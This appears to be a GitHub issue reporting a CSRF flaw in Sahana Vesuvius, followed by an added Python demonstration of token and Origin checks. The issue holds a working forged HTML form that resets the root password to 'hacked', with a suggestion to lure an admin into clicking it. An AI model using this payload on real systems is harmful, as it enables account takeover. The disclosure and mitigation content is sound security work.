sahana / vesuvius

Sahana Vesuvius
http://sahanafoundation.org/products/vesuvius/
MIT License

CSRF vulnerability #56

Open sampathLiyanage opened 10 years ago

sampathLiyanage commented 10 years ago

I checked the security of Vesuvius and found a critical vulnerability: Vesuvius forms don't have CSRF tokens! This allows someone to submit Vesuvius forms from any webpage outside Vesuvius.

For example, if an attacker wants to change the password of the user "root", they can do so by following the steps below.

  1. Host a website and create the following form on a webpage:

```html
<!-- Attacker-hosted page: a cross-site POST to the Vesuvius admin password handler -->
<form method="post" action="http://localhost/vesuvius/www/admin?passwdp&amp;tabid=5" name="form0">
  <input type="hidden" name="user" value="1">
  <input type="hidden" name="password" value="hacked">
  <input type="hidden" name="re_password" value="hacked">
  <input type="submit" value="Click Here">
</form>
```

    Note: the form action changes according to the web address of Vesuvius.

  2. Send the link of the webpage to the Vesuvius admin and make the admin click the button. If the admin clicks the button while logged in to Vesuvius, the password of the user "root" will be changed to "hacked" immediately!

    With a bit of social engineering this can be achieved easily.
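The issue describes the attack but not the fix. The following is an added example, not code from the Vesuvius project (which is PHP) or from the reporter: a Python model of the password-change handler in the two forms, the one the issue describes (any POST carrying the admin's session cookie is honoured) and a hardened one using the synchronizer-token pattern plus an Origin/Referer check. The user table, the session class, the site origin `http://localhost` and the header values are all assumed/constructed for the demonstration; the form field names and action are the ones quoted in the issue.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from html import escape

# Constructed in-memory user table standing in for the Vesuvius user store
# (hypothetical; user id "1" is "root", as in the forged form above).
USERS = {"1": {"username": "root", "password": "original"}}

# Deployment origin assumed for this example; the action is the one in the issue.
SITE_ORIGIN = "http://localhost"
FORM_ACTION = SITE_ORIGIN + "/vesuvius/www/admin?passwdp&tabid=5"


@dataclass
class Session:
    """Server-side session of a logged-in admin; the browser only holds its cookie."""
    user_id: str
    # One unguessable token per session (synchronizer-token pattern).
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def render_password_form(session: Session) -> str:
    """Page served to the admin: the session's token is embedded as a hidden field.
    An attacker's page cannot read it because of the same-origin policy."""
    return (
        f'<form method="post" action="{escape(FORM_ACTION)}">'
        f'<input type="hidden" name="csrf_token" value="{escape(session.csrf_token)}">'
        '<input type="hidden" name="user" value="1">'
        '<input type="password" name="password">'
        '<input type="password" name="re_password">'
        '<input type="submit" value="Change password"></form>'
    )


def change_password_vulnerable(session, post: dict) -> int:
    """Handler as the issue describes it: a valid session cookie is the only check."""
    if session is None:
        return 401
    if post.get("password") != post.get("re_password"):
        return 400
    USERS[post["user"]]["password"] = post["password"]
    return 200


def _same_site(source: str) -> bool:
    return source == SITE_ORIGIN or source.startswith(SITE_ORIGIN + "/")


def change_password_hardened(session, post: dict, headers: dict) -> int:
    """Same handler with a CSRF token check and an Origin/Referer check."""
    if session is None:
        return 401
    # Defence in depth: browsers send Origin (or at least Referer) on cross-site
    # form POSTs; it must name our own site. Reject when neither header is present.
    source = headers.get("Origin") or headers.get("Referer")
    if not source or not _same_site(source):
        return 403
    # Primary control: the token in the body must equal the one bound to the
    # session. The forged form from the issue cannot supply it. Constant-time
    # compare so a wrong token does not leak the right one through timing.
    submitted = str(post.get("csrf_token", ""))
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return 403
    if post.get("password") != post.get("re_password"):
        return 400
    USERS[post["user"]]["password"] = post["password"]
    return 200


# The attacker's form replayed by the victim's browser (constructed request): the
# browser attaches the victim's cookie, but Origin is the attacker's site and
# there is no token in the body.
FORGED_POST = {"user": "1", "password": "hacked", "re_password": "hacked"}
FORGED_HEADERS = {"Origin": "http://attacker.example", "Cookie": "sid=abc123"}


def demo() -> tuple:
    """Returns (vulnerable handler status, hardened handler status on the forged
    POST, hardened handler status on a genuine submission from the served form)."""
    admin = Session(user_id="42")
    vulnerable = change_password_vulnerable(admin, FORGED_POST)          # 200: "root" is now "hacked"
    USERS["1"]["password"] = "original"                                   # reset for the second run
    forged = change_password_hardened(admin, FORGED_POST, FORGED_HEADERS)  # 403: no token, wrong Origin
    legit_post = dict(FORGED_POST, csrf_token=admin.csrf_token, password="new", re_password="new")
    legit = change_password_hardened(admin, legit_post, {"Origin": SITE_ORIGIN})  # 200
    return vulnerable, forged, legit


if __name__ == "__main__":
    print(demo())
```

The token must be generated from a CSPRNG, stored server-side in the session, and compared in constant time; the Origin/Referer check alone is not sufficient (some clients strip Referer), which is why it is the secondary control here. Marking the session cookie `SameSite=Lax` would additionally stop the browser from attaching it to the cross-site POST in the issue, but that relies on client support and does not replace the token.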